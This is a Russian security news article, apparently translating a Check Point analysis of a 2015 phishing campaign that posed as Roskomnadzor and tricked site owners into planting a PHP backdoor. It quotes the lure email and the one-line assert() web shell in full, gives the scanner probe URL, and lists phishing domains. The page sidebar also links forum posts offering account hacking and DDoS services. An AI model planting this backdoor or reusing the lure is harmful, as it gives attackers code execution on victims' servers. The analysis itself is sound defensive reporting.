Нажмите CTRL-D чтобы добавить нас в закладки
Внимание! Вы находитесь в незащищенном режиме (HTTP). Для перехода в защищенный режим SSL, нажмите здесь
HackZone.RU - Фишинг на сотрудников в России
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Фишинг на сотрудников в России

09.11.2015

В период  с 27 по 30 августа 2015, датчики Check Point  зафиксировали большое число логов “PHP Print Remote Shell Command Execution”, сгенерированных системами защиты IPS. Эта  аномалия вызвала интерес, поскольку обычно мы  не наблюдали такой большой объем логов от этой системы защиты.

Мы начали исследовать логи, полученные из всех источников и обнаружили, что все они были схожи. А именно, данные во всех логах содержали следующую подозрительную команду:

roskomnadzor=print-439573653*57;

Изучив, что такое “roskomnadzor”, мы обнаружили, что это - название российской Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)  (и нам показалось, что русские боятся этой государственной организации).

Быстрый поиск по полным данным, содержащимся в логах (reestr/reestr-id128032.php?roskomnadzor=print-439573653*57;) возвратил 2 поста на сайте habrahabr.ru 

(Российский «Stack Overflow»). В этих постах было упомянуто таинственное письмо, полученное многими российскими владельцами доменов:

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени _______________ в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайт _________ был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени _____________, Вам необходимо:

1. Создать в корневой директории Вашего сайта папку reestr
2. Создать в данной папке файл reestr-id198617.php, содержащий следующий текст:

< ?php

/*Подтверждение доменного имени __________

assert(stripslashes($_REQUEST[roskomnadzor]));

?>

*В < ?php необходимо убрать пробел между < и ?php

Путь до файла на Вашем сайте должен получиться следующий: 

__________/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени _____________, следуя инструкции указанной выше, то Ваш сайт ____________ будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

— С уважением,

ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

(Взято с сайта habrahabr.ru/post/265515/)

Как Вы видите из текста, отправитель письма просит, чтобы каждый администратор домена создал папку, названную “reestr” на их веб-сервере в корневой папке, и добавил туда файл, названный “reestr-id128032.php”, содержащий следующий текст:

<? Php

/ * domain name * /

assert (stripslashes ($ _ REQUEST [roskomnadzor]));

?>

Функция assert() определяется строку в качестве PHP code и выполняет его.
Если пользователь последует инструкциям этого письма полученного по электронной почте и отправит серверу команду  на добавление в значение  roskomnadzor = путь к этому файлу, злоумышленник  получит возможность выполнять любой желаемый им код на сервере. В действительности это  полный бэкдор  к WEB-серверу.

Хотя в письме полученном по электронной почте дано объяснение, что изменения в российском законодательстве от 11 августа 2015 является причиной для его отправки, мы не нашли никаких доказательств фактического изменения в указанном законе.

Кроме того, письмо, полученное по электронной почте, содержит в тексте 2 ошибки, которые указывают на знакомство автора с украинским диалектом. Мы предположили, что русские поняли, что это - поддельная электронная почта; однако, мы обнаружили несколько серверов, которые выполнили инструкции этой электронной почты.

Роскомнадзор разослал широкому числу получателей  электронное письмо и разместил на официальном сайте, что им известно о  попытке фишинга с использованием этого электронного письма, и предупредили людей не выполнять указанные в нем изменения.

Фэйковое электронное письмо было отправлено с ящика zapret-info@roskomnadzor.org, в то время как реальный электронный адрес, использующийся Росконадзором для связи –  zapret-info-out@rkn.gov.ru.

Беглая проверка на Whois показала, что этот домен roskomnadzor.org был зарегистрирован в 19 августа 2015г. только на один год. Кроме того, при попытке подключится к этому домену, происходит редирект непосредственно на реальный вебсайт Роскомнадзора rkn.gov.ru.

Домен roskomnadzor.org в настоящее время зарегистрирован по IP-адресу 46.166.189.98 (Нидерланды). Этот IP-адрес связан со  многими вредоносными MD5 в Virus Total, в основном рекламного характера.

Еще несколько известных фишинг-сайтов на этом IP-адресе:
  • adiadas.com
  • iclouds.it 
  • allhotels.tv
  • ikea-berlin.com 
  • android-games.yt
  • ikea-store.com 
  • comast.com
  • installfilefox.com 
  • direct-dutyfree.com
  • linkedoin.com 
  • facaebook.com
  • pcypal-center.com
  • gooale.com
  • rediiff.com 
  • icloudidsupport.com
Мы предполагаем, что трафик, обнаруженный датчиками Check Point, состоял в основном из просмотров, осуществляемых людьми, которые были осведомлены или которые получили это электронное письмо и хотели найти серверы с этим бэкдором.

Это предположение основано на том факте, что в этих логах не установлено  никаких попыток выполнения вредоносного кода, а только использовалась команда “Print”. Кроме того, эти соединения появились спустя несколько часов после публикаций в habrahabr.ru.

Команда “Print” – это хорошо известная последовательность:

print-439573653*57;

И широко применяется в качестве метода  обнаружения PHP – серверов.

Если сервер будет действительно открыт для бэкдора “Роскомнадзора”, то на запрос сканера будет получен ответ с результатом вычисления этой команды (-25055698221). Таким образом, люди стоящие за просмотром, смогут определить серверы, у которых доступен этот бэкдор.

Самый значительный факт, в основе которого лежит наше предположение, – то, что в некоторых логах содержалось следующее предложение после главной команды:
http://domain.com/reestr/reestr-id128032.php?roskomnadzor=print 439573653*57;&privet_habrahabr!&ischem_specov_po_ib_horosho_platim&
pokupaem_i_prodaem_shells&ischem_teh_kto_pomojet_monetizirovat_sites&drugie_uslugi-datamining@exploit.im-

К сожалению, попытки установить связь через Jabber аккаунт были проигнорированы.

Это не первая попытка использования Роскомнадзора в кампаниях фишинга. В начале августа 2015г. была массовая рассылка электронной почты от имени Роскомнадзора, в которой утверждалось, что получатель нарушил федеральный закон относительно персональных данных и предлагалось открыть вложенный файл запаролленного архива RAR при помощи пароля «roscomnadzor». В очередной  раз Роскомнадзор разместил на их официальном сайте о том, что это поддельная электронная почта (http://rkn .gov.ru/news/rsoc/news34026.htm).


При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Безопасность
Опубликовал: DiMan
Просмотров: 851
Проголосовало через SMS: 0
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...
  • Adobe прощается с Flash

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » Hack-Взлом Gmail, Me.com,Mail, Ya, Rambler, Yahoo, Ok ,Vk,Wh
  • Разное / Болталка » Re: Срочно нужен перехват смс!
  • Взлом и безопасность / Программы » Re: Lumion 7 - испытание для мастеров
  • Downloads / Другое » Re: помогите, нужны базы по удмуртии
  • Downloads / Другое » помогите, нужны базы по удмуртии
  • Разное / Ищу работу » Re: -=Мощный DDoS service/ДДоС сервис=-
  • Разное / Предложения работы » Взломать и удалить дневник diary.ru
  • Downloads / Другое » Re: Помогите найти кряк на Everest Ultimate Edition v5.50.21...
  • Разное / Предложения работы » Высокооплачиваемая работа
  • Разное / Продам, отдам » Re: Прогон 7ым XRumerоm по форумам, блогам, гостевым. ru и e...

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}